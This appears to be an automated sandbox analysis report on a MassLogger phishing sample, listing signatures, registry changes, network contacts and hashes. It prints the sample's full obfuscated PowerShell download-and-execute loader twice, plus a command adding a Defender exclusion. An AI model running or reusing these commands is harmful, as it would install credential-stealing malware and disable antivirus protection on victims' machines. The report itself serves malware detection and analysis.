Analysis Overview
SHA256
2479411adb58bd76f54b991f75232058de6c387f7fe639bc66c13731ec81dff8
Threat Level: Known bad
The file fizetési igazolás.eml.msg was found to be: Known bad.
Malicious Activity Summary
MassLogger Main Payload
MassLogger
Process spawned unexpected child process
Blacklisted process makes network request
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2020-12-01 08:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2020-12-01 08:08
Reported
2020-12-01 08:10
Platform
win7v20201028
Max time kernel
55s
Max time network
147s
Command Line
Signatures
MassLogger
MassLogger Main Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Blacklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{47DF8E31-33B4-11EB-AA5C-E6A19248D3FE} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1512 wrote to memory of 1356 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1512 wrote to memory of 1356 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1512 wrote to memory of 1356 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1512 wrote to memory of 1356 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\fizetési_visszaigazolás.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $yquAX='D4!C7!72!72!02!E6!96!F6!A6!D2!02!37!27!16!86!34!96!96!36!37!16!42!02!D3!76!E6!96!27!47!35!96!96!36!37!16!42!B3!D7!22!F5!42!87!03!22!D5!56!47!97!26!B5!D5!27!16!86!36!B5!B7!02!47!36!56!A6!26!F4!D2!86!36!16!54!27!F6!64!C7!02!92!72!E5!72!82!47!96!C6!07!37!E2!67!D6!42!02!D3!37!27!16!86!34!96!96!36!37!16!42!B3!92!72!76!07!A6!E2!23!E4!F2!F6!27!E2!37!E6!16!27!47!16!46!16!36!F6!27!F2!F2!A3!07!47!47!86!72!C2!46!F6!86!47!56!D4!A3!A3!D5!56!07!97!45!C6!C6!16!34!E2!36!96!37!16!24!C6!16!57!37!96!65!E2!47!66!F6!37!F6!27!36!96!D4!B5!C2!72!76!E6!96!27!47!72!02!B2!02!72!35!46!16!72!02!B2!02!72!F6!C6!E6!72!02!B2!02!72!77!F6!44!72!C2!97!47!47!42!82!56!D6!16!E6!97!24!C6!C6!16!34!A3!A3!D5!E6!F6!96!47!36!16!27!56!47!E6!94!E2!36!96!37!16!24!C6!16!57!37!96!65!E2!47!66!F6!37!F6!27!36!96!D4!B5!02!D3!67!D6!42!B3!92!72!36!96!37!16!24!C6!16!57!37!96!65!E2!47!66!F6!37!F6!27!36!96!D4!72!82!56!D6!16!E4!C6!16!96!47!27!16!05!86!47!96!75!46!16!F6!C4!A3!A3!D5!97!C6!26!D6!56!37!37!14!E2!E6!F6!96!47!36!56!C6!66!56!25!E2!D6!56!47!37!97!35!B5!02!D5!46!96!F6!67!B5!B3!D4!C7!72!92!47!E6!56!72!B2!72!96!C6!34!26!72!B2!72!56!75!E2!47!72!B2!72!56!E4!02!47!36!72!B2!72!56!A6!26!F4!72!B2!72!D2!77!56!E4!82!72!D3!97!47!47!42!B3!23!23!07!42!02!D3!02!C6!F6!36!F6!47!F6!27!05!97!47!96!27!57!36!56!35!A3!A3!D5!27!56!76!16!E6!16!D4!47!E6!96!F6!05!56!36!96!67!27!56!35!E2!47!56!E4!E2!D6!56!47!37!97!35!B5!B3!92!23!73!03!33!02!C2!D5!56!07!97!45!C6!F6!36!F6!47!F6!27!05!97!47!96!27!57!36!56!35!E2!47!56!E4!E2!D6!56!47!37!97!35!B5!82!47!36!56!A6!26!F4!F6!45!A3!A3!D5!D6!57!E6!54!B5!02!D3!02!23!23!07!42!B3!92!76!E6!96!07!42!82!02!C6!96!47!E6!57!02!D7!47!56!96!57!15!D2!02!13!02!47!E6!57!F6!36!D2!02!D6!F6!36!E2!56!C6!76!F6!F6!76!02!07!D6!F6!36!D2!02!E6!F6!96!47!36!56!E6!E6!F6!36!D2!47!37!56!47!02!D3!02!76!E6!96!07!42!B7!02!F6!46!B3!56!E6!F6!26!45!42!02!D4!02!C6!16!37!B3!92!72!94!72!C2!72!E3!72!82!56!36!16!C6!07!56!27!E2!72!85!54!E3!72!D3!56!E6!F6!26!45!42';$text =$yquAX.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('!') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1512 CREDAT:275457 /prefetch:2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | rocadatrans.ro | udp |
| N/A | 84.247.61.4:80 | rocadatrans.ro | tcp |
| N/A | 8.8.8.8:53 | go.microsoft.com | udp |
| N/A | 8.8.8.8:53 | ieonline.microsoft.com | udp |
| N/A | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.225.66.103:80 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | crl.verisign.com | udp |
Files
memory/1008-2-0x0000000002790000-0x0000000002794000-memory.dmp
memory/1104-3-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp
memory/1104-4-0x00000000022E0000-0x00000000022E1000-memory.dmp
memory/1104-5-0x000000001AB80000-0x000000001AB81000-memory.dmp
memory/1104-6-0x00000000023C0000-0x00000000023C1000-memory.dmp
memory/1104-7-0x0000000002570000-0x0000000002571000-memory.dmp
memory/1104-8-0x000000001C3A0000-0x000000001C3A1000-memory.dmp
memory/1104-9-0x000000001C470000-0x000000001C471000-memory.dmp
memory/628-10-0x000007FEF7570000-0x000007FEF77EA000-memory.dmp
memory/1356-11-0x0000000000000000-mapping.dmp
memory/1104-13-0x000000001AAD0000-0x000000001AAE5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\11OV1DRW.txt
| MD5 | fc275e9a2a7b9b79a696d7b97cfad786 |
| SHA1 | 61d23d8d9c06a97adf9d57163dbe5a2fffcc3e42 |
| SHA256 | 91b352dcfbe19d7d8f997b5479a6550df8698b77741e72b3a49d876a53fe5d0d |
| SHA512 | 28bcd15ade65b38580041e1e8976143f5f6137a43566b9343fdc2d96677e7f227b2de835b74b31d801ab829899fddbd501d38c5a66898918bcc92d14349b1b9f |
memory/1104-15-0x0000000002470000-0x0000000002474000-memory.dmp
memory/1104-16-0x00000000023F0000-0x00000000023F8000-memory.dmp
memory/916-18-0x0000000000481B1E-mapping.dmp
memory/916-17-0x0000000000400000-0x0000000000486000-memory.dmp
memory/916-19-0x0000000000400000-0x0000000000486000-memory.dmp
memory/916-20-0x0000000000400000-0x0000000000486000-memory.dmp
memory/916-21-0x0000000070B30000-0x000000007121E000-memory.dmp
memory/1656-24-0x0000000000000000-mapping.dmp
memory/1656-25-0x0000000070B30000-0x000000007121E000-memory.dmp
memory/1656-27-0x0000000004850000-0x0000000004851000-memory.dmp
memory/1656-26-0x0000000000D90000-0x0000000000D91000-memory.dmp
memory/1656-28-0x00000000010E0000-0x00000000010E1000-memory.dmp
memory/1656-29-0x0000000005240000-0x0000000005241000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | d50a3c9affa214174d8fc3b762083a0e |
| SHA1 | 03f0f759ac9f6d4232e1a90e87bc2a6019f9a87a |
| SHA256 | 973712d528f35646cc068dfdb748153dd34d9fe9a0b727cffad79a7c4e3e9e78 |
| SHA512 | e801471ef7847d1ff69eb587e9d2a8e04cbf9dd9ff2541abd94cdb81f166c9d2f6862d6766fe87e55630ae124fdd1322430053970fedff3f55fdf71a6ca567e0 |
memory/1656-33-0x0000000006030000-0x0000000006031000-memory.dmp
memory/1656-38-0x0000000006070000-0x0000000006071000-memory.dmp
memory/1656-39-0x0000000006150000-0x0000000006151000-memory.dmp
memory/1656-46-0x0000000006290000-0x0000000006291000-memory.dmp
memory/1656-47-0x00000000055F0000-0x00000000055F1000-memory.dmp
memory/1656-62-0x0000000006310000-0x0000000006311000-memory.dmp
memory/1656-61-0x0000000006300000-0x0000000006301000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2020-12-01 08:08
Reported
2020-12-01 08:10
Platform
win10v20201028
Max time kernel
10s
Max time network
113s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Blacklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\fizetési_visszaigazolás.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $yquAX='D4!C7!72!72!02!E6!96!F6!A6!D2!02!37!27!16!86!34!96!96!36!37!16!42!02!D3!76!E6!96!27!47!35!96!96!36!37!16!42!B3!D7!22!F5!42!87!03!22!D5!56!47!97!26!B5!D5!27!16!86!36!B5!B7!02!47!36!56!A6!26!F4!D2!86!36!16!54!27!F6!64!C7!02!92!72!E5!72!82!47!96!C6!07!37!E2!67!D6!42!02!D3!37!27!16!86!34!96!96!36!37!16!42!B3!92!72!76!07!A6!E2!23!E4!F2!F6!27!E2!37!E6!16!27!47!16!46!16!36!F6!27!F2!F2!A3!07!47!47!86!72!C2!46!F6!86!47!56!D4!A3!A3!D5!56!07!97!45!C6!C6!16!34!E2!36!96!37!16!24!C6!16!57!37!96!65!E2!47!66!F6!37!F6!27!36!96!D4!B5!C2!72!76!E6!96!27!47!72!02!B2!02!72!35!46!16!72!02!B2!02!72!F6!C6!E6!72!02!B2!02!72!77!F6!44!72!C2!97!47!47!42!82!56!D6!16!E6!97!24!C6!C6!16!34!A3!A3!D5!E6!F6!96!47!36!16!27!56!47!E6!94!E2!36!96!37!16!24!C6!16!57!37!96!65!E2!47!66!F6!37!F6!27!36!96!D4!B5!02!D3!67!D6!42!B3!92!72!36!96!37!16!24!C6!16!57!37!96!65!E2!47!66!F6!37!F6!27!36!96!D4!72!82!56!D6!16!E4!C6!16!96!47!27!16!05!86!47!96!75!46!16!F6!C4!A3!A3!D5!97!C6!26!D6!56!37!37!14!E2!E6!F6!96!47!36!56!C6!66!56!25!E2!D6!56!47!37!97!35!B5!02!D5!46!96!F6!67!B5!B3!D4!C7!72!92!47!E6!56!72!B2!72!96!C6!34!26!72!B2!72!56!75!E2!47!72!B2!72!56!E4!02!47!36!72!B2!72!56!A6!26!F4!72!B2!72!D2!77!56!E4!82!72!D3!97!47!47!42!B3!23!23!07!42!02!D3!02!C6!F6!36!F6!47!F6!27!05!97!47!96!27!57!36!56!35!A3!A3!D5!27!56!76!16!E6!16!D4!47!E6!96!F6!05!56!36!96!67!27!56!35!E2!47!56!E4!E2!D6!56!47!37!97!35!B5!B3!92!23!73!03!33!02!C2!D5!56!07!97!45!C6!F6!36!F6!47!F6!27!05!97!47!96!27!57!36!56!35!E2!47!56!E4!E2!D6!56!47!37!97!35!B5!82!47!36!56!A6!26!F4!F6!45!A3!A3!D5!D6!57!E6!54!B5!02!D3!02!23!23!07!42!B3!92!76!E6!96!07!42!82!02!C6!96!47!E6!57!02!D7!47!56!96!57!15!D2!02!13!02!47!E6!57!F6!36!D2!02!D6!F6!36!E2!56!C6!76!F6!F6!76!02!07!D6!F6!36!D2!02!E6!F6!96!47!36!56!E6!E6!F6!36!D2!47!37!56!47!02!D3!02!76!E6!96!07!42!B7!02!F6!46!B3!56!E6!F6!26!45!42!02!D4!02!C6!16!37!B3!92!72!94!72!C2!72!E3!72!82!56!36!16!C6!07!56!27!E2!72!85!54!E3!72!D3!56!E6!F6!26!45!42';$text =$yquAX.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('!') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
Network
| Country | Destination | Domain | Proto |
| N/A | 52.109.8.21:443 | tcp | |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | rocadatrans.ro | udp |
| N/A | 84.247.61.4:80 | rocadatrans.ro | tcp |
Files
memory/756-2-0x0000021282780000-0x0000021282784000-memory.dmp
memory/1548-3-0x00007FFFD2630000-0x00007FFFD301C000-memory.dmp
memory/1548-4-0x000001275CF30000-0x000001275CF31000-memory.dmp
memory/1548-5-0x000001275F100000-0x000001275F101000-memory.dmp